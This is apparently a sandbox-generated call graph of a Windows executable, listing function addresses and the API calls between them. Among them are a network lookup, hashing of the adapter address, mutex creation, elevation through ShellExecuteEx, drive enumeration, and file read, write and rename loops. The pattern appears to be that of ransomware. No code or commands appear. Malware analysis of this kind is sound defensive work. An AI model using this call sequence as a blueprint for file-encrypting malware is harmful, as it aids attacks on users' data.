38999->39035 39003 f1cf30 59 API calls 39001->39003 39002->38842 39006 f1c0b2 39003->39006 39043 f1c540 59 API calls Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception 39005->39043 39006->39002 39039 f1d5b0 39006->39039 39009 f140f2 39008->39009 39010 f14009 39008->39010 39055 f4f26c 59 API calls 3 library calls 39009->39055 39012 f14016 39010->39012 39013 f1405d 39010->39013 39014 f140fc 39012->39014 39015 f14022 39012->39015 39016 f14106 39013->39016 39017 f14066 39013->39017 39056 f4f26c 59 API calls 3 library calls 39014->39056 39019 f14044 39015->39019 39020 f1402b 39015->39020 39057 f4f23e 59 API calls 2 library calls 39016->39057 39022 f14078 _signal 39017->39022 39046 f16760 39017->39046 39045 f12e80 59 API calls _memmove 39019->39045 39044 f12e80 59 API calls _memmove 39020->39044 39022->38849 39027 f1403b 39027->38849 39030 f14054 39030->38849 39036 f1cf41 39035->39036 39037 f1cf5b 39035->39037 39036->39037 39038 f14690 59 API calls 39036->39038 39037->39002 39038->39036 39040 f1d5e2 39039->39040 39041 f1d63e 39040->39041 39042 f14690 59 API calls 39040->39042 39041->39002 39042->39040 39043->39006 39044->39027 39045->39030 39048 f16793 39046->39048 39047 f16817 _signal 39047->39022 39048->39047 39050 f23b4c 59 API calls 39048->39050 39052 f167dc 39048->39052 39050->39052 39052->39047 39058 f4f1bb 59 API calls 3 library calls 39052->39058 39055->39014 39056->39016 39059 f54c30 39061 f20c62 58 API calls 39059->39061 39060 f54c3a 39061->39060 39062 f23f84 39063 f23f90 _ungetc 39062->39063 39099 f32603 GetStartupInfoW 39063->39099 39066 f23f95 39101 f278d5 GetProcessHeap 39066->39101 39067 f23fed 39068 f23ff8 39067->39068 39430 f2411a 58 API calls 3 library calls 39067->39430 39102 f25141 39068->39102 39071 f23ffe 39072 f24009 __RTC_Initialize 39071->39072 39431 f2411a 58 API calls 3 library calls 39071->39431 39123 f28754 39072->39123 39075 f24018 39076 f24024 GetCommandLineW 39075->39076 39432 f2411a 58 API calls 3 library calls 39075->39432 39142 f3235f GetEnvironmentStringsW 39076->39142 39079 f24023 39079->39076 39082 f2403e 39083 f24049 39082->39083 39433 f27c2e 58 API calls 3 library calls 39082->39433 39152 f321a1 39083->39152 39089 f2405a 39166 f27c68 39089->39166 39090 f24062 39091 f2406d __wwincmdln 39090->39091 39435 f27c2e 58 API calls 3 library calls 39090->39435 39172 f19f90 39091->39172 39094 f24081 39095 f24090 39094->39095 39436 f27f3d 58 API calls _doexit 39094->39436 39437 f27c59 58 API calls _doexit 39095->39437 39098 f24095 _ungetc 39100 f32619 39099->39100 39100->39066 39101->39067 39438 f27d6c 36 API calls 2 library calls 39102->39438 39104 f25146 39439 f28c48 InitializeCriticalSectionAndSpinCount __ioinit 39104->39439 39106 f2514b 39107 f2514f 39106->39107 39441 f324f7 TlsAlloc 39106->39441 39440 f251b7 61 API calls 2 library calls 39107->39440 39110 f25154 39110->39071 39111 f25161 39111->39107 39112 f2516c 39111->39112 39113 f28c96 __calloc_crt 58 API calls 39112->39113 39114 f25179 39113->39114 39115 f251ae 39114->39115 39442 f32553 TlsSetValue 39114->39442 39444 f251b7 61 API calls 2 library calls 39115->39444 39118 f2518d 39118->39115 39120 f25193 39118->39120 39119 f251b3 39119->39071 39443 f2508e 58 API calls 4 library calls 39120->39443 39122 f2519b GetCurrentThreadId 39122->39071 39124 f28760 _ungetc 39123->39124 39445 f28af7 39124->39445 39126 f28767 39127 f28c96 __calloc_crt 58 API calls 39126->39127 39128 f28778 39127->39128 39129 f287e3 GetStartupInfoW 39128->39129 39130 f28783 _ungetc @_EH4_CallFilterFunc@8 39128->39130 39136 f287f8 39129->39136 39139 f28927 39129->39139 39130->39075 39131 f289ef 39454 f289ff LeaveCriticalSection _doexit 39131->39454 39133 f28c96 __calloc_crt 58 API calls 39133->39136 39134 f28974 GetStdHandle 39134->39139 39135 f28987 GetFileType 39135->39139 39136->39133 39138 f28846 39136->39138 39136->39139 39137 f2887a GetFileType 39137->39138 39138->39137 39138->39139 39452 f3263e InitializeCriticalSectionAndSpinCount 39138->39452 39139->39131 39139->39134 39139->39135 39453 f3263e InitializeCriticalSectionAndSpinCount 39139->39453 39143 f32370 39142->39143 39144 f24034 39142->39144 39486 f28cde 58 API calls 2 library calls 39143->39486 39148 f31f64 GetModuleFileNameW 39144->39148 39146 f32396 _signal 39147 f323ac FreeEnvironmentStringsW 39146->39147 39147->39144 39149 f31f98 _wparse_cmdline 39148->39149 39151 f31fd8 _wparse_cmdline 39149->39151 39487 f28cde 58 API calls 2 library calls 39149->39487 39151->39082 39153 f2404f 39152->39153 39154 f321ba _fputws 39152->39154 39153->39089 39434 f27c2e 58 API calls 3 library calls 39153->39434 39155 f28c96 __calloc_crt 58 API calls 39154->39155 39158 f321e3 _fputws 39155->39158 39156 f3223a 39157 f20bed _free 58 API calls 39156->39157 39157->39153 39158->39153 39158->39156 39159 f28c96 __calloc_crt 58 API calls 39158->39159 39160 f3225f 39158->39160 39163 f32276 39158->39163 39488 f2962f 58 API calls ___crtsetenv 39158->39488 39159->39158 39161 f20bed _free 58 API calls 39160->39161 39161->39153 39489 f242fd 8 API calls 2 library calls 39163->39489 39165 f32282 39168 f27c74 __IsNonwritableInCurrentImage 39166->39168 39490 f3aeb5 39168->39490 39169 f27c92 __initterm_e 39171 f27cb1 _doexit __IsNonwritableInCurrentImage 39169->39171 39493 f219ac 67 API calls __cinit 39169->39493 39171->39090 39173 f19fa0 __ftell_nolock 39172->39173 39494 f0cf10 39173->39494 39175 f19fb0 39176 f19fc4 GetCurrentProcess GetLastError SetPriorityClass 39175->39176 39177 f19fb4 39175->39177 39179 f19fe4 GetLastError 39176->39179 39180 f19fe6 39176->39180 39788 f124e0 109 API calls _memset 39177->39788 39179->39180 39182 f1d3c0 59 API calls 39180->39182 39181 f19fb9 39181->39094 39183 f1a00a 39182->39183 39184 f1a022 39183->39184 39185 f1b669 39183->39185 39189 f1d340 59 API calls 39184->39189 39798 f4f23e 59 API calls 2 library calls 39185->39798 39187 f1b673 39799 f4f23e 59 API calls 2 library calls 39187->39799 39191 f1a04d 39189->39191 39191->39187 39192 f1a065 39191->39192 39508 f13a90 39192->39508 39196 f1a159 GetCommandLineW CommandLineToArgvW lstrcpyW 39197 f1a33d GlobalFree 39196->39197 39212 f1a196 39196->39212 39199 f1a354 39197->39199 39200 f1a45c 39197->39200 39198 f1a100 39198->39196 39201 f12220 76 API calls 39199->39201 39527 f12220 39200->39527 39203 f1a359 39201->39203 39205 f1a466 39203->39205 39542 f0ef50 39203->39542 39204 f1a1cc lstrcmpW lstrcmpW 39204->39212 39205->39094 39207 f1a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 39207->39212 39208 f1a48f 39211 f1a4ef 39208->39211 39547 f13ea0 39208->39547 39209 f20235 60 API calls _TranslateName 39209->39212 39213 f11cd0 92 API calls 39211->39213 39212->39197 39212->39204 39212->39207 39212->39209 39214 f1a361 39212->39214 39215 f1a563 39213->39215 39524 f23c92 39214->39524 39219 f1a57e 39215->39219 39225 f1a5f5 39215->39225 39218 f1a395 OpenProcess 39220 f1a402 39218->39220 39221 f1a3a9 WaitForSingleObject CloseHandle 39218->39221 39223 f14690 59 API calls 39219->39223 39228 f11cd0 92 API calls 39220->39228 39221->39220 39224 f1a3cb 39221->39224 39222 f1a6f9 39795 f11a10 8 API calls 39222->39795 39227 f1a5a9 39223->39227 39241 f1a3e2 GlobalFree 39224->39241 39242 f1a3d4 Sleep 39224->39242 39789 f11ab0 PeekMessageW 39224->39789 39225->39222 39226 f1a6fe 39225->39226 39250 f1a5db 39225->39250 39230 f1a8b6 CreateMutexA 39226->39230 39231 f1a70f 39226->39231 39233 f14690 59 API calls 39227->39233 39234 f1a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 39228->39234 39236 f1a8ca 39230->39236 39235 f1a7dc 39231->39235 39246 f0ef50 58 API calls 39231->39246 39238 f1a5d4 39233->39238 39239 f1a451 39234->39239 39243 f0ef50 58 API calls 39235->39243 39240 f0ef50 58 API calls 39236->39240 39237 f1a624 GetVersion 39237->39222 39244 f1a632 lstrcpyW lstrcatW lstrcatW 39237->39244 39794 f0d240 132 API calls 4 library calls 39238->39794 39239->39094 39254 f1a8da 39240->39254 39247 f1a3f7 39241->39247 39242->39218 39248 f1a7ec 39243->39248 39249 f1a674 _memset 39244->39249 39257 f1a72f 39246->39257 39247->39094 39251 f1a7f1 lstrlenA 39248->39251 39253 f1a6b4 ShellExecuteExW 39249->39253 39250->39225 39250->39230 39250->39237 39252 f20c62 _malloc 58 API calls 39251->39252 39255 f1a810 _memset 39252->39255 39253->39226 39256 f1a6e3 39253->39256 39258 f13ea0 59 API calls 39254->39258 39270 f1a92f 39254->39270 39260 f1a81e MultiByteToWideChar lstrcatW 39255->39260 39274 f1a9d1 39256->39274 39259 f13ea0 59 API calls 39257->39259 39262 f1a780 39257->39262 39258->39254 39259->39257 39260->39251 39261 f1a847 lstrlenW 39260->39261 39263 f1a8a0 CreateMutexA 39261->39263 39264 f1a856 39261->39264 39265 f1a792 39262->39265 39266 f1a79c CreateThread 39262->39266 39263->39236 39568 f0e760 39264->39568 39268 f13ff0 59 API calls 39265->39268 39266->39235 39271 f1a7d0 39266->39271 41105 f1dbd0 95 API calls 4 library calls 39266->41105 39268->39266 39269 f1a860 CreateThread WaitForSingleObject 39269->39263 41036 f1e690 39269->41036 39272 f15c10 59 API calls 39270->39272 39271->39235 39273 f1a98c 39272->39273 39579 f12840 39273->39579 39274->39094 39276 f1a997 39584 f10fc0 CryptAcquireContextW 39276->39584 39278 f1a9ab 39279 f1a9c2 lstrlenA 39278->39279 39279->39274 39280 f1a9d8 39279->39280 39281 f15c10 59 API calls 39280->39281 39282 f1aa23 39281->39282 39283 f12840 60 API calls 39282->39283 39284 f1aa2e lstrcpyA 39283->39284 39286 f1aa4b 39284->39286 39287 f15c10 59 API calls 39286->39287 39288 f1aa90 39287->39288 39289 f0ef50 58 API calls 39288->39289 39290 f1aaa0 39289->39290 39291 f13ea0 59 API calls 39290->39291 39292 f1aaf5 39290->39292 39291->39290 39293 f13ff0 59 API calls 39292->39293 39294 f1ab1d 39293->39294 39607 f12900 39294->39607 39296 f0ef50 58 API calls 39298 f1abc5 39296->39298 39297 f1ab28 _memmove 39297->39296 39299 f13ea0 59 API calls 39298->39299 39300 f1ac1e 39298->39300 39299->39298 39301 f13ff0 59 API calls 39300->39301 39302 f1ac46 39301->39302 39303 f12900 60 API calls 39302->39303 39305 f1ac51 _memmove 39303->39305 39304 f0ef50 58 API calls 39306 f1acee 39304->39306 39305->39304 39307 f13ea0 59 API calls 39306->39307 39308 f1ad43 39306->39308 39307->39306 39309 f13ff0 59 API calls 39308->39309 39310 f1ad6b 39309->39310 39311 f12900 60 API calls 39310->39311 39314 f1ad76 _memmove 39311->39314 39312 f15c10 59 API calls 39313 f1ae2a 39312->39313 39612 f13580 39313->39612 39314->39312 39316 f1ae3c 39317 f15c10 59 API calls 39316->39317 39318 f1ae76 39317->39318 39319 f13580 59 API calls 39318->39319 39320 f1ae82 39319->39320 39321 f15c10 59 API calls 39320->39321 39322 f1aebc 39321->39322 39323 f13580 59 API calls 39322->39323 39324 f1aec8 39323->39324 39325 f15c10 59 API calls 39324->39325 39326 f1af02 39325->39326 39327 f13580 59 API calls 39326->39327 39328 f1af0e 39327->39328 39329 f15c10 59 API calls 39328->39329 39330 f1af48 39329->39330 39331 f13580 59 API calls 39330->39331 39332 f1af54 39331->39332 39333 f15c10 59 API calls 39332->39333 39334 f1af8e 39333->39334 39335 f13580 59 API calls 39334->39335 39336 f1af9a 39335->39336 39337 f15c10 59 API calls 39336->39337 39338 f1afd4 39337->39338 39339 f13580 59 API calls 39338->39339 39340 f1afe0 39339->39340 39341 f13100 59 API calls 39340->39341 39342 f1b001 39341->39342 39343 f13580 59 API calls 39342->39343 39344 f1b025 39343->39344 39345 f13100 59 API calls 39344->39345 39346 f1b03c 39345->39346 39347 f13580 59 API calls 39346->39347 39348 f1b059 39347->39348 39349 f13100 59 API calls 39348->39349 39350 f1b070 39349->39350 39351 f13580 59 API calls 39350->39351 39352 f1b07c 39351->39352 39353 f13100 59 API calls 39352->39353 39354 f1b093 39353->39354 39355 f13580 59 API calls 39354->39355 39356 f1b09f 39355->39356 39357 f13100 59 API calls 39356->39357 39358 f1b0b6 39357->39358 39359 f13580 59 API calls 39358->39359 39360 f1b0c2 39359->39360 39361 f13100 59 API calls 39360->39361 39362 f1b0d9 39361->39362 39363 f13580 59 API calls 39362->39363 39364 f1b0e5 39363->39364 39365 f13100 59 API calls 39364->39365 39366 f1b0fc 39365->39366 39367 f13580 59 API calls 39366->39367 39368 f1b108 39367->39368 39370 f1b130 39368->39370 39796 f1cdd0 59 API calls 39368->39796 39371 f0ef50 58 API calls 39370->39371 39372 f1b16e 39371->39372 39374 f1b1a5 GetUserNameW 39372->39374 39619 f12de0 39372->39619 39375 f1b1c9 39374->39375 39626 f12c40 39375->39626 39377 f1b1d8 39633 f12bf0 39377->39633 39381 f1b2f5 39644 f136c0 39381->39644 39385 f1b311 39660 f130b0 39385->39660 39387 f12c40 59 API calls 39402 f1b1f3 39387->39402 39390 f12900 60 API calls 39390->39402 39391 f1b327 39687 f111c0 CreateFileW 39391->39687 39392 f13580 59 API calls 39392->39402 39394 f1b33b 39772 f1ba10 LoadCursorW RegisterClassExW 39394->39772 39396 f13100 59 API calls 39396->39402 39397 f1b343 39773 f1ba80 CreateWindowExW 39397->39773 39399 f1b34b 39399->39274 39776 f10a50 GetLogicalDrives 39399->39776 39402->39381 39402->39387 39402->39390 39402->39392 39402->39396 39797 f0f1f0 59 API calls 39402->39797 39403 f1b379 39404 f13100 59 API calls 39403->39404 39405 f1b3a5 39404->39405 39406 f13580 59 API calls 39405->39406 39429 f1b3b3 39406->39429 39407 f1b48b 39787 f1fdc0 CreateThread 39407->39787 39409 f1b49f GetMessageW 39410 f1b4ed 39409->39410 39411 f1b4bf 39409->39411 39412 f1b502 PostThreadMessageW 39410->39412 39413 f1b55b 39410->39413 39414 f1b4c5 TranslateMessage DispatchMessageW GetMessageW 39411->39414 39416 f1b510 PeekMessageW 39412->39416 39417 f1b564 PostThreadMessageW 39413->39417 39418 f1b5bb 39413->39418 39414->39410 39414->39414 39415 f1c330 59 API calls 39415->39429 39419 f1b546 WaitForSingleObject 39416->39419 39420 f1b526 DispatchMessageW PeekMessageW 39416->39420 39421 f1b570 PeekMessageW 39417->39421 39418->39274 39424 f1b5d2 CloseHandle 39418->39424 39419->39413 39419->39416 39420->39419 39420->39420 39422 f1b5a6 WaitForSingleObject 39421->39422 39423 f1b586 DispatchMessageW PeekMessageW 39421->39423 39422->39418 39422->39421 39423->39422 39423->39423 39424->39274 39425 f1c240 59 API calls 39425->39429 39426 f1b8b0 59 API calls 39426->39429 39427 f13260 59 API calls 39427->39429 39429->39407 39429->39415 39429->39425 39429->39426 39429->39427 39786 f1fa10 CreateThread 39429->39786 39430->39068 39431->39072 39432->39079 39436->39095 39437->39098 39438->39104 39439->39106 39440->39110 39441->39111 39442->39118 39443->39122 39444->39119 39446 f28b1b EnterCriticalSection 39445->39446 39447 f28b08 39445->39447 39446->39126 39455 f28b9f 39447->39455 39449 f28b0e 39449->39446 39479 f27c2e 58 API calls 3 library calls 39449->39479 39452->39138 39453->39139 39454->39130 39456 f28bab _ungetc 39455->39456 39457 f28bb4 39456->39457 39458 f28bcc 39456->39458 39480 f27f51 58 API calls 2 library calls 39457->39480 39464 f28bed _ungetc 39458->39464 39483 f28cde 58 API calls 2 library calls 39458->39483 39461 f28bb9 39481 f27fae 58 API calls 10 library calls 39461->39481 39463 f28be1 39466 f28bf7 39463->39466 39467 f28be8 39463->39467 39464->39449 39465 f28bc0 39482 f27b0b GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 39465->39482 39470 f28af7 __lock 58 API calls 39466->39470 39469 f25208 ___crtsetenv 58 API calls 39467->39469 39469->39464 39472 f28bfe 39470->39472 39473 f28c23 39472->39473 39474 f28c0b 39472->39474 39475 f20bed _free 58 API calls 39473->39475 39484 f3263e InitializeCriticalSectionAndSpinCount 39474->39484 39477 f28c17 39475->39477 39485 f28c3f LeaveCriticalSection _doexit 39477->39485 39480->39461 39481->39465 39483->39463 39484->39477 39485->39464 39486->39146 39487->39151 39488->39158 39489->39165 39491 f3aeb8 EncodePointer 39490->39491 39491->39491 39492 f3aed2 39491->39492 39492->39169 39493->39171 39495 f0cf32 _memset __ftell_nolock 39494->39495 39496 f0cf4f InternetOpenW 39495->39496 39497 f15c10 59 API calls 39496->39497 39498 f0cf8a InternetOpenUrlW 39497->39498 39499 f0cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 39498->39499 39507 f0cfb2 39498->39507 39800 f156d0 39499->39800 39501 f0d000 39502 f156d0 59 API calls 39501->39502 39503 f0d049 39502->39503 39503->39507 39819 f13010 59 API calls 39503->39819 39505 f0d084 39505->39507 39820 f13010 59 API calls 39505->39820 39507->39175 39509 f13ab2 39508->39509 39516 f13ad0 GetModuleFileNameW PathRemoveFileSpecW 39508->39516 39510 f13b00 39509->39510 39511 f13aba 39509->39511 39822 f4f23e 59 API calls 2 library calls 39510->39822 39512 f23b4c 59 API calls 39511->39512 39514 f13ac7 39512->39514 39514->39516 39823 f4f1bb 59 API calls 3 library calls 39514->39823 39518 f18400 39516->39518 39519 f18437 39518->39519 39523 f18446 39518->39523 39519->39523 39824 f15d50 59 API calls _signal 39519->39824 39520 f184b9 39520->39198 39523->39520 39825 f18d50 59 API calls 39523->39825 39826 f31781 39524->39826 39528 f2f7c0 __ftell_nolock 39527->39528 39529 f1222d 7 API calls 39528->39529 39530 f122bd K32EnumProcesses 39529->39530 39531 f1228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 39529->39531 39532 f122d3 39530->39532 39533 f122df 39530->39533 39531->39530 39532->39203 39534 f12353 39533->39534 39535 f122f0 OpenProcess 39533->39535 39534->39203 39536 f12346 CloseHandle 39535->39536 39537 f1230a K32EnumProcessModules 39535->39537 39536->39534 39536->39535 39537->39536 39538 f1231c K32GetModuleBaseNameW 39537->39538 39842 f20235 39538->39842 39540 f1233e 39540->39536 39541 f12345 39540->39541 39541->39536 39543 f20c62 _malloc 58 API calls 39542->39543 39546 f0ef6e _memset 39543->39546 39544 f0efdc 39544->39208 39545 f20c62 _malloc 58 API calls 39545->39546 39546->39544 39546->39545 39548 f13f05 39547->39548 39552 f13eae 39547->39552 39549 f13fb1 39548->39549 39550 f13f18 39548->39550 39856 f4f23e 59 API calls 2 library calls 39549->39856 39553 f13fbb 39550->39553 39554 f13f2d 39550->39554 39556 f13f3d _signal 39550->39556 39552->39548 39560 f13ed4 39552->39560 39857 f4f23e 59 API calls 2 library calls 39553->39857 39554->39556 39558 f16760 59 API calls 39554->39558 39556->39208 39558->39556 39562 f13ed9 39560->39562 39563 f13eef 39560->39563 39854 f13da0 59 API calls _signal 39562->39854 39855 f13da0 59 API calls _signal 39563->39855 39566 f13eff 39566->39208 39567 f13ee9 39567->39208 39858 f0e670 39568->39858 39570 f0e79e 39571 f13ea0 59 API calls 39570->39571 39572 f0e7c3 39571->39572 39573 f13ff0 59 API calls 39572->39573 39574 f0e7ff 39573->39574 39884 f0e870 39574->39884 39576 f0e806 39577 f13ff0 59 API calls 39576->39577 39578 f0e80d 39576->39578 39577->39578 39578->39269 40154 f13c40 39579->40154 39581 f1288c WideCharToMultiByte 40164 f184e0 39581->40164 39583 f128cf 39583->39276 39585 f1102b CryptCreateHash 39584->39585 39586 f1101a 39584->39586 39587 f11045 39585->39587 39588 f11056 lstrlenA CryptHashData 39585->39588 40182 f30eca RaiseException 39586->40182 40183 f30eca RaiseException 39587->40183 39591 f1107f CryptGetHashParam 39588->39591 39592 f1106e 39588->39592 39594 f1109f 39591->39594 39596 f110b0 _memset 39591->39596 40184 f30eca RaiseException 39592->40184 40185 f30eca RaiseException 39594->40185 39597 f110cf CryptGetHashParam 39596->39597 39598 f110f5 39597->39598 39599 f110e4 39597->39599 39600 f20c62 _malloc 58 API calls 39598->39600 40186 f30eca RaiseException 39599->40186 39603 f11105 _memset 39600->39603 39602 f11148 39605 f1114e CryptDestroyHash CryptReleaseContext 39602->39605 39603->39602 39604 f204a6 _sprintf 83 API calls 39603->39604 39606 f11133 lstrcatA 39604->39606 39605->39278 39606->39602 39606->39603 39608 f13a90 59 API calls 39607->39608 39609 f1294c MultiByteToWideChar 39608->39609 39610 f18400 59 API calls 39609->39610 39611 f1298d 39610->39611 39611->39297 39613 f13591 39612->39613 39614 f135d6 39612->39614 39613->39614 39615 f13597 39613->39615 39618 f135b7 39614->39618 40188 f14f70 59 API calls 39614->40188 39615->39618 40187 f14f70 59 API calls 39615->40187 39618->39316 39620 f12dec 39619->39620 39623 f12dfa 39619->39623 39621 f13ea0 59 API calls 39620->39621 39622 f12df5 39621->39622 39622->39372 39624 f13ea0 59 API calls 39623->39624 39625 f12e11 39624->39625 39625->39372 39627 f12c71 39626->39627 39628 f12c5f 39626->39628 39631 f156d0 59 API calls 39627->39631 39629 f156d0 59 API calls 39628->39629 39630 f12c6a 39629->39630 39630->39377 39632 f12c8a 39631->39632 39632->39377 39634 f13ff0 59 API calls 39633->39634 39635 f12c13 39634->39635 39636 f0ecb0 39635->39636 39637 f0ece5 39636->39637 39639 f0eefc 39637->39639 40189 f21b3b 59 API calls 3 library calls 39637->40189 39639->39402 39640 f156d0 59 API calls 39643 f0ed6b _memmove 39640->39643 39641 f15230 59 API calls 39641->39643 39643->39639 39643->39640 39643->39641 40190 f21b3b 59 API calls 3 library calls 39643->40190 39645 f13742 39644->39645 39646 f136e7 39644->39646 39651 f1370d 39645->39651 40192 f14f70 59 API calls 39645->40192 39646->39645 39647 f136ed 39646->39647 39647->39651 40191 f14f70 59 API calls 39647->40191 39648 f1377f 39653 f0ca70 39648->39653 39651->39648 39652 f14690 59 API calls 39651->39652 39652->39648 39657 f0cb64 39653->39657 39659 f0caa3 39653->39659 39654 f0cb6b 40193 f4f26c 59 API calls 3 library calls 39654->40193 39656 f0cb75 39656->39385 39657->39385 39658 f136c0 59 API calls 39658->39659 39659->39654 39659->39657 39659->39658 39661 f14690 59 API calls 39660->39661 39662 f130d4 39661->39662 39663 f0c740 39662->39663 40194 f20fdd 39663->40194 39666 f0c944 CreateDirectoryW 39668 f20fdd 115 API calls 39666->39668 39671 f0c960 39668->39671 39669 f0c90e 39669->39666 39675 f0c96a 39669->39675 39670 f0c906 40217 f23a38 39670->40217 39671->39675 39683 f0c9d5 39671->39683 40230 f228fd 82 API calls 5 library calls 39671->40230 39675->39391 39676 f0c9ed 40232 f228fd 82 API calls 5 library calls 39676->40232 39677 f20546 58 API calls 39684 f0c79e _memmove 39677->39684 39680 f0c9f8 39682 f23a38 __fcloseall 83 API calls 39680->39682 39681 f15c10 59 API calls 39681->39684 39685 f0c9fe 39682->39685 40231 f228fd 82 API calls 5 library calls 39683->40231 39684->39670 39684->39677 39684->39681 39686 f14f70 59 API calls 39684->39686 40204 f21101 39684->40204 39685->39675 39686->39684 39688 f11223 GetFileSizeEx 39687->39688 39707 f11287 39687->39707 39689 f112a3 VirtualAlloc 39688->39689 39690 f11234 39688->39690 39692 f1131a CloseHandle 39689->39692 39696 f112c0 _memset 39689->39696 39690->39689 39691 f1123c CloseHandle 39690->39691 39693 f13100 59 API calls 39691->39693 39692->39394 39694 f11253 39693->39694 40650 f159d0 39694->40650 39699 f112e9 SetFilePointerEx 39696->39699 39731 f113a7 39696->39731 39697 f113b7 SetFilePointer 39702 f113f5 ReadFile 39697->39702 39770 f115ae 39697->39770 39698 f1126a MoveFileW 39698->39707 39700 f11332 ReadFile 39699->39700 39701 f1130c VirtualFree 39699->39701 39700->39701 39703 f1134f 39700->39703 39701->39692 39704 f11440 39702->39704 39705 f1140f VirtualFree CloseHandle 39702->39705 39703->39701 39708 f11356 39703->39708 39711 f11471 lstrlenA 39704->39711 39712 f11718 lstrlenA 39704->39712 39704->39770 39709 f1142f 39705->39709 39706 f115c5 SetFilePointerEx 39706->39705 39710 f115df 39706->39710 39707->39394 39708->39697 39715 f12c40 59 API calls 39708->39715 39709->39394 39713 f115ed WriteFile 39710->39713 39717 f11602 39710->39717 40676 f20be4 39711->40676 40728 f20be4 39712->40728 39713->39705 39713->39717 39720 f11364 39715->39720 39718 f130b0 59 API calls 39717->39718 39722 f11631 39718->39722 39720->39731 39732 f11379 VirtualFree CloseHandle 39720->39732 39725 f12840 60 API calls 39722->39725 39726 f1163c WriteFile 39725->39726 39734 f11658 39726->39734 39731->39697 39735 f11396 39732->39735 39734->39705 39737 f11660 lstrlenA WriteFile 39734->39737 39735->39394 39737->39705 39739 f11686 CloseHandle 39737->39739 39740 f13100 59 API calls 39739->39740 39741 f116a3 39740->39741 39742 f159d0 59 API calls 39741->39742 39744 f116be MoveFileW 39742->39744 39746 f116e4 VirtualFree 39744->39746 39750 f118a7 39744->39750 39751 f116fc 39746->39751 39754 f118e3 39750->39754 39755 f118d5 VirtualFree 39750->39755 39751->39394 39754->39707 39758 f118e8 CloseHandle 39754->39758 39755->39754 39758->39707 39770->39706 39772->39397 39774 f1bab9 39773->39774 39775 f1babb ShowWindow UpdateWindow 39773->39775 39774->39399 39775->39399 39777 f10a81 39776->39777 39778 f10bb4 39777->39778 39779 f156d0 59 API calls 39777->39779 39780 f13ea0 59 API calls 39777->39780 39783 f13ff0 59 API calls 39777->39783 39784 f12900 60 API calls 39777->39784 39785 f13580 59 API calls 39777->39785 39778->39403 39779->39777 39781 f10ae0 SetErrorMode PathFileExistsA SetErrorMode 39780->39781 39781->39777 39782 f10b0c GetDriveTypeA 39781->39782 39782->39777 39783->39777 39784->39777 39785->39777 39786->39429 40819 f1f130 timeGetTime 39786->40819 39787->39409 41023 f1fd80 39787->41023 39788->39181 39790 f11ad0 39789->39790 39791 f11af4 39789->39791 39792 f11afc 39790->39792 39793 f11adc DispatchMessageW PeekMessageW 39790->39793 39791->39224 39792->39224 39793->39790 39793->39791 39794->39250 39795->39226 39796->39370 39797->39402 39801 f15735 39800->39801 39802 f156de 39800->39802 39803 f157bc 39801->39803 39804 f1573e 39801->39804 39802->39801 39811 f15704 39802->39811 39821 f4f23e 59 API calls 2 library calls 39803->39821 39806 f16760 59 API calls 39804->39806 39809 f15750 _signal 39804->39809 39806->39809 39809->39501 39813 f15709 39811->39813 39814 f1571f 39811->39814 39815 f13ff0 59 API calls 39813->39815 39816 f13ff0 59 API calls 39814->39816 39817 f15719 39815->39817 39818 f1572f 39816->39818 39817->39501 39818->39501 39819->39505 39820->39507 39824->39523 39825->39523 39829 f31570 39826->39829 39830 f31580 39829->39830 39831 f31586 39830->39831 39833 f315ae 39830->39833 39832 f25208 ___crtsetenv 58 API calls 39831->39832 39834 f3158b 39832->39834 39838 f315cf wcstoxl 39833->39838 39841 f2e883 GetStringTypeW 39833->39841 39840 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 39834->39840 39837 f25208 ___crtsetenv 58 API calls 39839 f1a36e lstrcpyW lstrcpyW 39837->39839 39838->39837 39838->39839 39839->39218 39840->39839 39841->39833 39843 f20241 39842->39843 39844 f202b6 39842->39844 39846 f25208 ___crtsetenv 58 API calls 39843->39846 39848 f20266 39843->39848 39853 f202c8 60 API calls 3 library calls 39844->39853 39849 f2024d 39846->39849 39847 f202c3 39847->39540 39848->39540 39852 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 39849->39852 39851 f20258 39851->39540 39852->39851 39853->39847 39854->39567 39855->39566 39859 f20c62 _malloc 58 API calls 39858->39859 39860 f0e684 39859->39860 39861 f20c62 _malloc 58 API calls 39860->39861 39862 f0e690 39861->39862 39863 f0e6b4 GetAdaptersInfo 39862->39863 39864 f0e699 39862->39864 39866 f0e6c4 39863->39866 39867 f0e6db GetAdaptersInfo 39863->39867 39865 f21f2d _wprintf 85 API calls 39864->39865 39870 f0e6a3 39865->39870 39871 f20bed _free 58 API calls 39866->39871 39868 f0e741 39867->39868 39869 f0e6ea 39867->39869 39875 f20bed _free 58 API calls 39868->39875 39908 f204a6 39869->39908 39874 f20bed _free 58 API calls 39870->39874 39872 f0e6ca 39871->39872 39876 f20c62 _malloc 58 API calls 39872->39876 39878 f0e6a9 39874->39878 39879 f0e74a 39875->39879 39880 f0e6d2 39876->39880 39878->39570 39879->39570 39880->39864 39880->39867 39882 f0e737 39883 f21f2d _wprintf 85 API calls 39882->39883 39883->39868 39885 f156d0 59 API calls 39884->39885 39886 f0e8bb CryptAcquireContextW 39885->39886 39887 f0e8d8 39886->39887 39888 f0e8e9 CryptCreateHash 39886->39888 40149 f30eca RaiseException 39887->40149 39890 f0e903 39888->39890 39891 f0e914 CryptHashData 39888->39891 40150 f30eca RaiseException 39890->40150 39893 f0e932 39891->39893 39894 f0e943 CryptGetHashParam 39891->39894 40151 f30eca RaiseException 39893->40151 39896 f0e963 39894->39896 39898 f0e974 _memset 39894->39898 40152 f30eca RaiseException 39896->40152 39899 f0e993 CryptGetHashParam 39898->39899 39900 f0e9a8 39899->39900 39906 f0e9b9 39899->39906 40153 f30eca RaiseException 39900->40153 39902 f0ea10 39904 f0ea16 CryptDestroyHash CryptReleaseContext 39902->39904 39903 f204a6 _sprintf 83 API calls 39903->39906 39905 f0ea33 39904->39905 39905->39576 39906->39902 39906->39903 39907 f13ea0 59 API calls 39906->39907 39907->39906 39909 f204c2 39908->39909 39910 f204d7 39908->39910 39912 f25208 ___crtsetenv 58 API calls 39909->39912 39910->39909 39911 f204de 39910->39911 39937 f26ab6 39911->39937 39914 f204c7 39912->39914 39936 f242d2 9 API calls 